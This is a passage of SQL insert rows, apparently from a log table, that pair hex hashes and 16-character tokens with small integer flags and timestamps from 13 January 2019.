(48748, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:54:24'),
(48749, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:55:15'),
(48750, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:55:41'),
(48751, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:56:27'),
(48752, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:56:49'),
(48753, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:57:06'),
(48754, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:57:22'),
(48755, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:57:41'),
(48756, '866df19914482aec68ccbb23156f41bc', '46713cac27a94b83', 0, 2, 1, '2019-01-13 05:08:47'),
(48757, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 05:09:04'),
(48758, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 05:09:20'),
(48759, 'c9dfc056ffc7cd60df6d19b37633e9a1', 'e8f7be4b1d642ed6', 0, 2, 1, '2019-01-13 05:09:27'),
(48760, '855c668ce6f205b722555ac079e4dc9a', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-13 05:12:28'),
(48761, '855c668ce6f205b722555ac079e4dc9a', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-13 05:12:49'),
(48762, '855c668ce6f205b722555ac079e4dc9a', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-13 05:13:16'),
(48763, '5fe7a15fb54491dd34925b028c056b9b', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-13 05:14:09'),
(48764, '5fe7a15fb54491dd34925b028c056b9b', 'baa8d16c1a4e5230', 0, 2, 1, '2019-01-13 05:15:05'),
(48765, '10f714e3547943d4917a794ee2a51c89', '37408aac83974700', 0, 2, 1, '2019-01-13 05:20:34'),
(48766, '1a21fbb53023e7ec4eed56b85e464b2d', '29c11e1b0b9f1fa0', 0, 2, 1, '2019-01-13 05:20:52'),
(48767, '10f714e3547943d4917a794ee2a51c89', '37408aac83974700', 0, 2, 1, '2019-01-13 05:22:30'),
(48768, '855c668ce6f205b722555ac079e4dc9a', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-13 05:41:26'),
(48769, 'abdd4e75e83495eee3e35052315cee5d', 'bed2d19e1e403fcf', 0, 2, 1, '2019-01-13 05:43:34'),
(48770, 'f792f012b7d01f56e2c4c51368359d73', '902707f5f9572218', 0, 2, 1, '2019-01-13 05:43:39'),
(48771, 'f792f012b7d01f56e2c4c51368359d73', '902707f5f9572218', 0, 2, 1, '2019-01-13 05:45:06'),
(48772, 'df3d7a9375ca91262c90d8bd968dac27', 'ea9410bf7dd63565', 0, 2, 1, '2019-01-13 05:56:54'),
(48773, '4eff2af5da03e5299776d8f34f767fa1', '8a144e5fc2e94311', 0, 2, 1, '2019-01-13 05:57:06'),
(48774, '61217c8b7244333a4abca014b4a48aac', 'f6ba05ec245ef581', 0, 2, 1, '2019-01-13 05:57:59'),
(48775, 'cb5c31cf979d6e7634aa832e7281307c', '32edccf9c82daf54', 0, 2, 1, '2019-01-13 05:59:02'),
(48776, '61217c8b7244333a4abca014b4a48aac', 'f6ba05ec245ef581', 0, 2, 1, '2019-01-13 05:59:21'),
(48777, 'cb5c31cf979d6e7634aa832e7281307c', '32edccf9c82daf54', 0, 2, 1, '2019-01-13 06:00:01'),
(48778, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 06:01:58'),
(48779, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 06:02:49'),
(48780, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 06:02:58'),
(48781, '95b433b9d52516d933983f93a3324bb8', '3de88ff4581dab27', 0, 2, 1, '2019-01-13 06:03:14'),
(48782, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 06:03:26'),
(48783, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 06:03:38'),
(48784, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:04:35'),
(48785, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:05:14'),
(48786, 'be202acdf82d5948bed7f823d94a1a8c', '80cee253b668119a', 0, 2, 1, '2019-01-13 06:05:31'),
(48787, 'f453cfddfeeab6bafca9c08e806721c1', '77d629067fed3a03', 0, 2, 1, '2019-01-13 06:07:23'),
(48788, '16fe265f96203cf7c6088197f82e5dd4', '6f3d3b119389efb2', 0, 2, 1, '2019-01-13 06:08:26'),
(48789, '16fe265f96203cf7c6088197f82e5dd4', '6f3d3b119389efb2', 0, 2, 1, '2019-01-13 06:08:52'),
(48790, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 06:09:33'),
(48791, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 06:09:58'),
(48792, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:10:03'),
(48793, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:10:39'),
(48794, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-13 06:14:09'),
(48795, '102efd50ac614f62537ee4f7b12ef57b', '32b169e936bbe5df', 0, 2, 1, '2019-01-13 06:14:11'),
(48796, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 06:14:27'),
(48797, '6abddd3701c92c2001edb3115ecd93ad', 'a4d896a6fb2e7ba8', 0, 2, 1, '2019-01-13 06:16:43'),
(48798, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:16:53'),
(48799, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:17:09'),
(48800, '6abddd3701c92c2001edb3115ecd93ad', 'a4d896a6fb2e7ba8', 0, 2, 1, '2019-01-13 06:17:54'),
(48801, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 06:19:15'),
(48802, 'f874e0566ca366b3355493402c86c508', 'fe961668877fa513', 0, 2, 1, '2019-01-13 06:20:45'),
(48803, 'f792f012b7d01f56e2c4c51368359d73', '902707f5f9572218', 0, 2, 1, '2019-01-13 06:21:17'),
(48804, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:24:07'),
(48805, '2539be007c4a320d3e93767e2a3dd719', '7501b42c35accff7', 0, 2, 1, '2019-01-13 06:25:31'),
(48806, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:26:31'),
(48807, 'f4c2dc4cf3f30cae2569fd753aeb1208', '3e6a18344d8b3fc3', 0, 2, 1, '2019-01-13 06:27:33'),
(48808, 'f453cfddfeeab6bafca9c08e806721c1', '77d629067fed3a03', 0, 2, 1, '2019-01-13 06:28:51'),
(48809, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:29:28'),
(48810, '102efd50ac614f62537ee4f7b12ef57b', '32b169e936bbe5df', 0, 2, 1, '2019-01-13 06:29:29'),
(48811, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:29:53'),
(48812, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:30:23'),
(48813, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:31:24'),
(48814, '855c668ce6f205b722555ac079e4dc9a', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-13 06:31:50'),
(48815, '95b433b9d52516d933983f93a3324bb8', '3de88ff4581dab27', 0, 2, 1, '2019-01-13 06:31:59'),
(48816, 'f4c2dc4cf3f30cae2569fd753aeb1208', '3e6a18344d8b3fc3', 0, 2, 1, '2019-01-13 06:33:34'),
(48817, '8e64c34034c6eed74ac6303fd2d62eba', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-13 06:35:08'),
(48818, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:35:45'),
(48819, '2539be007c4a320d3e93767e2a3dd719', '7501b42c35accff7', 0, 2, 1, '2019-01-13 06:38:03'),
(48820, 'd09f8c4a752d5d706003b0534724a0c6', '7ec969d351bcf68e', 0, 2, 1, '2019-01-13 06:38:59'),
(48821, 'f874e0566ca366b3355493402c86c508', 'fe961668877fa513', 0, 2, 1, '2019-01-13 06:48:31'),
(48822, '28c1917aec1d5b4c90df4da3057cd6ac', '51df446c19685386', 0, 2, 1, '2019-01-13 06:50:30'),
(48823, 'c188e1c5e7f11c79073af50767bd2699', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-13 06:50:56'),
(48824, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:51:21'),
(48825, 'd09f8c4a752d5d706003b0534724a0c6', '7ec969d351bcf68e', 0, 2, 1, '2019-01-13 06:51:58'),
(48826, '8703668cee282e5fd6bd42ef38ac171a', '95c77dfcf8bdba24', 0, 2, 1, '2019-01-13 06:52:07'),
(48827, 'd09f8c4a752d5d706003b0534724a0c6', '7ec969d351bcf68e', 0, 2, 1, '2019-01-13 06:52:41'),
(48828, 'c188e1c5e7f11c79073af50767bd2699', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-13 06:52:44'),
(48829, '9f472ef97cd5c046e63fd3234e3bff5e', '0bf16c319bd2f666', 0, 2, 1, '2019-01-13 06:52:54'),
(48830, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:52:54'),
(48831, 'd09f8c4a752d5d706003b0534724a0c6', '7ec969d351bcf68e', 0, 2, 1, '2019-01-13 06:53:08'),
(48832, '102efd50ac614f62537ee4f7b12ef57b', '32b169e936bbe5df', 0, 2, 1, '2019-01-13 06:53:28'),
(48833, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:53:59'),
(48834, '8703668cee282e5fd6bd42ef38ac171a', '95c77dfcf8bdba24', 0, 2, 1, '2019-01-13 06:54:08'),
(48835, 'd09f8c4a752d5d706003b0534724a0c6', '7ec969d351bcf68e', 0, 2, 1, '2019-01-13 06:54:11'),
(48836, 'c188e1c5e7f11c79073af50767bd2699', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-13 06:54:17'),
(48837, '962bde3467ccb79e3b3f320d13ccad89', '83bb13387505b354', 0, 2, 1, '2019-01-13 06:54:42'),
(48838, 'c188e1c5e7f11c79073af50767bd2699', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-13 06:54:43'),
(48839, 'd48041619e314201cfaba15709fe8abb', '9fa71c818742c95f', 0, 2, 1, '2019-01-13 06:55:09'),
(48840, '102efd50ac614f62537ee4f7b12ef57b', '32b169e936bbe5df', 0, 2, 1, '2019-01-13 06:55:54'),
(48841, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 06:56:50'),
(48842, 'c188e1c5e7f11c79073af50767bd2699', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-13 06:58:33'),
(48843, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 06:58:46'),
(48844, '64ebaa730d3f0de5e61e36698a216e8b', '3616947d425dcf53', 0, 2, 1, '2019-01-13 06:58:50'),
(48845, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 06:59:06'),
(48846, '4d191cf568d338a9101a87059e91856a', 'b3bf3468e0c56f69', 0, 2, 1, '2019-01-13 06:59:34'),
(48847, '64ebaa730d3f0de5e61e36698a216e8b', '3616947d425dcf53', 0, 2, 1, '2019-01-13 06:59:48'),
(48848, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 07:00:01'),
(48849, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 07:00:07'),
(48850, '4d191cf568d338a9101a87059e91856a', 'b3bf3468e0c56f69', 0, 2, 1, '2019-01-13 07:00:11'),
(48851, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 07:00:52'),
(48852, '1eea189d80f11bd450b3e96bed18a126', '46713cac27a94b83', 0, 2, 1, '2019-01-13 07:01:00'),
(48853, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 07:01:09'),
(48854, '4d191cf568d338a9101a87059e91856a', 'b3bf3468e0c56f69', 0, 2, 1, '2019-01-13 07:03:57'),
(48855, 'e1a615558ac44a1fdb0aa3b447396bd3', '7501b42c35accff7', 0, 2, 1, '2019-01-13 07:04:44'),
(48856, '0d580ffb2894fc1c4954e3dac642a367', '813518eddc998d16', 0, 2, 1, '2019-01-13 07:05:21'),
(48857, 'ed220c8148bd26aaebfb094db3ffb4eb', '4599e2ad4bb251fe', 0, 2, 1, '2019-01-13 07:05:40'),
(48858, '32d3d85bb1403c136c2193ba227a3db8', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-13 07:09:09'),
(48859, '3477e70cc96d1ded277a887f7cd5b6ad', '6e117bd555667400', 0, 2, 1, '2019-01-13 07:10:52'),
(48860, '1920a5633895554487d1c2e94f94ebc4', '6521fe834dce4d43', 0, 2, 1, '2019-01-13 07:11:44'),
(48861, '52766aee53b3f799da4844f05d27d48c', '650fcb788c1b7116', 0, 2, 1, '2019-01-13 07:11:57'),
(48862, '1920a5633895554487d1c2e94f94ebc4', '6521fe834dce4d43', 0, 2, 1, '2019-01-13 07:11:58'),
(48863, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:12:32'),
(48864, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:13:25'),
(48865, 'e6fb40c798d2750615b49b3304a25a1a', 'dba49dcafdc2b991', 0, 2, 1, '2019-01-13 07:15:02'),
(48866, 'e6fb40c798d2750615b49b3304a25a1a', 'dba49dcafdc2b991', 0, 2, 1, '2019-01-13 07:15:08'),
(48867, 'c34cf48e85f081fc6faa83770204ffa6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-13 07:15:56'),
(48868, '9f472ef97cd5c046e63fd3234e3bff5e', '0bf16c319bd2f666', 0, 2, 1, '2019-01-13 07:16:41'),
(48869, '962bde3467ccb79e3b3f320d13ccad89', '83bb13387505b354', 0, 2, 1, '2019-01-13 07:16:43'),
(48870, '102efd50ac614f62537ee4f7b12ef57b', '32b169e936bbe5df', 0, 2, 1, '2019-01-13 07:17:42'),
(48871, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:19:07'),
(48872, '3c48d2c655f224c0287ae0df90740e64', '67ba6c89353d1c80', 0, 2, 1, '2019-01-13 07:19:23'),
(48873, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:19:34'),
(48874, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:19:49'),
(48875, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:21:13'),
(48876, 'ac47e0640a5c9a21ca1c18d4158cd59a', '3affdb6d237dd814', 0, 2, 1, '2019-01-13 07:21:34'),
(48877, 'f8dd725427994b870fa61f9f6597315f', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-13 07:21:48'),
(48878, '962bde3467ccb79e3b3f320d13ccad89', '83bb13387505b354', 0, 2, 1, '2019-01-13 07:22:35'),
(48879, '358e5d9ce2dc1912e7a3cb139ab99a3c', 'ccdfa4c67082a494', 0, 2, 1, '2019-01-13 07:22:51'),
(48880, 'f8dd725427994b870fa61f9f6597315f', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-13 07:22:55'),
(48881, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 07:23:02'),
(48882, 'b8579c6875fb3eb03ebe7dfb44edf7cf', '503a514a8daa32a7', 0, 2, 1, '2019-01-13 07:23:18'),
(48883, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-01-13 07:23:31'),
(48884, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-01-13 07:23:45'),
(48885, 'd079598bcf1030e50aa0f4c2db7fb62b', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-13 07:24:54'),
(48886, '0ed1eb4dfa16cc32064441a402362d8f', '960d12b6c14f65ca', 0, 2, 1, '2019-01-13 07:25:21'),
(48887, '07d416d53341c27ffc01d65c49c4e3b6', 'fbf0576065758144', 0, 2, 1, '2019-01-13 07:27:25'),
(48888, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:29:53'),
(48889, '3a9a27ef8d68dd389cf423c1a0bc430f', '60ed72c979f92224', 0, 2, 1, '2019-01-13 07:33:29'),
(48890, '3a9a27ef8d68dd389cf423c1a0bc430f', '60ed72c979f92224', 0, 2, 1, '2019-01-13 07:34:06'),
(48891, 'd079598bcf1030e50aa0f4c2db7fb62b', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-13 07:35:13'),
(48892, 'd98bca51284f40f78c450def1670a88a', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:36:07'),
(48893, 'd48041619e314201cfaba15709fe8abb', '9fa71c818742c95f', 0, 2, 1, '2019-01-13 07:37:11'),
(48894, '8ae5ea9f4afb08b08f0971e3d4a5d35a', 'ef481d7f2589b41c', 0, 2, 1, '2019-01-13 07:40:21'),
(48895, 'bed51eeb9f3ceb1f4d6d2cc472c0d0cf', 'a639f655bef0fc87', 0, 2, 1, '2019-01-13 07:41:36'),
(48896, 'ebae6173980d5f9be4a05309e2e35393', 'f52a42a05787db8d', 0, 2, 1, '2019-01-13 07:41:49'),
(48897, 'ebae6173980d5f9be4a05309e2e35393', 'f52a42a05787db8d', 0, 2, 1, '2019-01-13 07:42:11'),
(48898, 'ebae6173980d5f9be4a05309e2e35393', 'f52a42a05787db8d', 0, 2, 1, '2019-01-13 07:42:40'),
(48899, '6abddd3701c92c2001edb3115ecd93ad', 'a4d896a6fb2e7ba8', 0, 2, 1, '2019-01-13 07:44:49'),
(48900, '3c48d2c655f224c0287ae0df90740e64', '67ba6c89353d1c80', 0, 2, 1, '2019-01-13 07:46:57'),
(48901, 'c34cf48e85f081fc6faa83770204ffa6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-13 07:47:30'),
(48902, 'ab61b00ae77b1f4846e6613b252806de', 'd94549175215a321', 0, 2, 1, '2019-01-13 07:48:00'),
(48903, '32d3d85bb1403c136c2193ba227a3db8', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-13 07:49:00'),
(48904, 'ce369fcf7482134873166d37e887837f', 'f4310bcd3a0b59ad', 0, 2, 1, '2019-01-13 07:49:19'),
(48905, 'ab1c7ee65f91a7864ec473d9fcc63504', '0530018377078939', 0, 2, 1, '2019-01-13 07:51:33'),
(48906, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-01-13 07:54:49'),
(48907, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-01-13 07:55:18'),
(48908, 'dc2b4f81335d9c2a7fae4dee00bf2b4d', '721a08095e6444d9', 0, 2, 1, '2019-01-13 07:57:30'),
(48909, '3743217b54e5d0937ae8d2d5a5173aa6', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-13 07:58:08'),
(48910, '3743217b54e5d0937ae8d2d5a5173aa6', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-13 07:58:19'),
(48911, '1920a5633895554487d1c2e94f94ebc4', '6521fe834dce4d43', 0, 2, 1, '2019-01-13 07:58:22'),
(48912, '3635217c3af81dd6eeaba2080b639b41', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 07:58:23'),
(48913, '9a4b1d8320b8e2ee86d3b8a722760d87', '00cfdd65313a346b', 0, 2, 1, '2019-01-13 07:59:09'),
(48914, 'ff7ab5d3e3d7cec119c86cf69d27de2f', '9485c0cbaf2078d7', 0, 2, 1, '2019-01-13 08:00:46'),
(48915, 'a2fb2797181bdbe2a69453908a960728', 'e642b8d17adbe462', 0, 2, 1, '2019-01-13 08:03:44'),
(48916, '0c2eb970ecf8d68ee81d88a1a11d8de8', 'b250c4bde35c1eef', 0, 2, 1, '2019-01-13 08:05:42'),
(48917, '0c2eb970ecf8d68ee81d88a1a11d8de8', 'b250c4bde35c1eef', 0, 2, 1, '2019-01-13 08:06:35'),
(48918, '3743217b54e5d0937ae8d2d5a5173aa6', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-13 08:08:37'),
(48919, 'e7be6e0cd392718fb1cb31df4c77c284', 'bde81e6d4d49308e', 0, 2, 1, '2019-01-13 08:11:42'),
(48920, 'e7be6e0cd392718fb1cb31df4c77c284', 'bde81e6d4d49308e', 0, 2, 1, '2019-01-13 08:12:47'),
(48921, '919ec9ba05e62448cbe5ccc9c6075abf', '81813d0a0d1e159b', 0, 2, 1, '2019-01-13 08:15:20'),
(48922, 'e7be6e0cd392718fb1cb31df4c77c284', 'bde81e6d4d49308e', 0, 2, 1, '2019-01-13 08:15:33'),
(48923, '7cae281cdc24010a26615c1a35dd4cf5', '2d3b99b95c288881', 0, 2, 1, '2019-01-13 08:15:39'),
(48924, '3ea1c3222e4a668f26f3123ad59e5656', '68843997edd972c9', 0, 2, 1, '2019-01-13 08:15:51'),
(48925, 'cc41c27aa34bc6ecbac0ab44328de5d5', '4d95d492a595b2dc', 0, 2, 1, '2019-01-13 08:17:02'),
(48926, '10cc25f9acde5e3c4166e606b45ae2ad', 'b3648e386d2392b7', 0, 2, 1, '2019-01-13 08:17:14'),
(48927, '10cc25f9acde5e3c4166e606b45ae2ad', 'b3648e386d2392b7', 0, 2, 1, '2019-01-13 08:17:49'),
(48928, '10cc25f9acde5e3c4166e606b45ae2ad', 'b3648e386d2392b7', 0, 2, 1, '2019-01-13 08:18:21'),
(48929, 'c34cf48e85f081fc6faa83770204ffa6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-13 08:20:14'),
(48930, '900007fa84f00393988c066f8b701f82', 'c6da2a6f9b230084', 0, 2, 1, '2019-01-13 08:22:01'),
(48931, '3743217b54e5d0937ae8d2d5a5173aa6', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-13 08:22:30'),
(48932, '10cc25f9acde5e3c4166e606b45ae2ad', 'b3648e386d2392b7', 0, 2, 1, '2019-01-13 08:24:16'),
(48933, '10cc25f9acde5e3c4166e606b45ae2ad', 'b3648e386d2392b7', 0, 2, 1, '2019-01-13 08:25:01'),
(48934, 'c921149815094c7b03d8350d7ea9f152', '5fa71acfcd440189', 0, 2, 1, '2019-01-13 08:25:08'),
(48935, 'c921149815094c7b03d8350d7ea9f152', '5fa71acfcd440189', 0, 2, 1, '2019-01-13 08:25:25'),
(48936, 'c921149815094c7b03d8350d7ea9f152', '5fa71acfcd440189', 0, 2, 1, '2019-01-13 08:26:04'),
(48937, 'f7ab97b025cdd2389d54c9c0c12afbd4', 'b301d833ea94d585', 0, 2, 1, '2019-01-13 08:28:50'),
(48938, 'ce3fc2c7ada3ceec567b087d264e37c8', '433577cdf4c8f98a', 0, 2, 1, '2019-01-13 08:28:53'),
(48939, 'f7ab97b025cdd2389d54c9c0c12afbd4', 'b301d833ea94d585', 0, 2, 1, '2019-01-13 08:29:11'),
(48940, '919ec9ba05e62448cbe5ccc9c6075abf', '81813d0a0d1e159b', 0, 2, 1, '2019-01-13 08:31:55'),
(48941, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-13 08:32:52'),
(48942, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-13 08:33:44'),
(48943, '3a9a27ef8d68dd389cf423c1a0bc430f', '60ed72c979f92224', 0, 2, 1, '2019-01-13 08:33:54'),
(48944, 'f7ab97b025cdd2389d54c9c0c12afbd4', 'b301d833ea94d585', 0, 2, 1, '2019-01-13 08:34:41'),
(48945, '919ec9ba05e62448cbe5ccc9c6075abf', '81813d0a0d1e159b', 0, 2, 1, '2019-01-13 08:34:50'),
(48946, 'c34cf48e85f081fc6faa83770204ffa6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-13 08:41:36'),
(48947, '3477e70cc96d1ded277a887f7cd5b6ad', '6e117bd555667400', 0, 2, 1, '2019-01-13 08:45:49'),
(48948, '5c7faa6996c5e82fd1e1c8e676539eeb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-13 08:47:25'),
(48949, '5c7faa6996c5e82fd1e1c8e676539eeb', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-13 08:47:51'),
(48950, 'c34cf48e85f081fc6faa83770204ffa6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-13 08:51:02'),
(48951, 'c34cf48e85f081fc6faa83770204ffa6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-13 08:51:17'),
(48952, 'd079598bcf1030e50aa0f4c2db7fb62b', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-13 09:02:17'),
(48953, 'ca40f567820113de08edeb2ffc69040d', '9f9ba2177b2fa737', 0, 2, 1, '2019-01-13 09:02:40'),
(48954, '1f73d4b7fcf3b35027f355e732228f85', 'b3bf3468e0c56f69', 0, 2, 1, '2019-01-13 09:02:40'),
(48955, 'd079598bcf1030e50aa0f4c2db7fb62b', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-13 09:04:56'),
(48956, 'de105f7a84282ed5111672021efe51a4', '814e14b432590743', 0, 2, 1, '2019-01-13 09:05:28'),
(48957, 'f8c4b470c7d80f91d10a0e745892a268', '511c6f370538ba65', 0, 2, 1, '2019-01-13 09:06:18'),
(48958, 'b51b73141a9f20e79ebc91bf71fbb415', '113a26d6adf3f967', 0, 2, 1, '2019-01-13 09:06:30'),
(48959, 'dc2b4f81335d9c2a7fae4dee00bf2b4d', '721a08095e6444d9', 0, 2, 1, '2019-01-13 09:07:38'),
(48960, 'd540b782dbedbef1aedf7579afa0ec61', '8b34767869df763e', 0, 2, 1, '2019-01-13 09:09:17'),
(48961, '1f73d4b7fcf3b35027f355e732228f85', 'b3bf3468e0c56f69', 0, 2, 1, '2019-01-13 09:10:35'),
(48962, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 09:19:32'),
(48963, '07c886a4e989fcfa9f962b96c84dc2f3', '19ac418837a1bfb6', 0, 2, 1, '2019-01-13 09:20:36'),
(48964, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-13 09:21:06'),
(48965, '900007fa84f00393988c066f8b701f82', 'c6da2a6f9b230084', 0, 2, 1, '2019-01-13 09:21:33'),
(48966, 'fced4d5031ae8c716acfff4163fa799a', '9699c45903fe17ef', 0, 2, 1, '2019-01-13 09:30:38'),
(48967, '900007fa84f00393988c066f8b701f82', 'c6da2a6f9b230084', 0, 2, 1, '2019-01-13 09:31:44'),
(48968, '0c61407fbba97ef9f85661c941f13ed7', '91d3688e197526d0', 0, 2, 1, '2019-01-13 09:42:14'),
(48969, '0c61407fbba97ef9f85661c941f13ed7', '91d3688e197526d0', 0, 2, 1, '2019-01-13 09:42:27'),
(48970, '086aeaea22ea606034fe77a4030e9eb4', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-13 09:45:43'),
(48971, '0bf1aab23a47888f2fa9a49d6e3a60c1', '2a0dfe27a45d43bd', 0, 2, 1, '2019-01-13 09:47:52'),
(48972, 'd079598bcf1030e50aa0f4c2db7fb62b', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-13 09:47:54'),
(48973, 'e1a615558ac44a1fdb0aa3b447396bd3', '7501b42c35accff7', 0, 2, 1, '2019-01-13 09:49:04'),
(48974, 'e1a615558ac44a1fdb0aa3b447396bd3', '7501b42c35accff7', 0, 2, 1, '2019-01-13 09:49:41'),
(48975, 'e1a615558ac44a1fdb0aa3b447396bd3', '7501b42c35accff7', 0, 2, 1, '2019-01-13 09:50:08'),
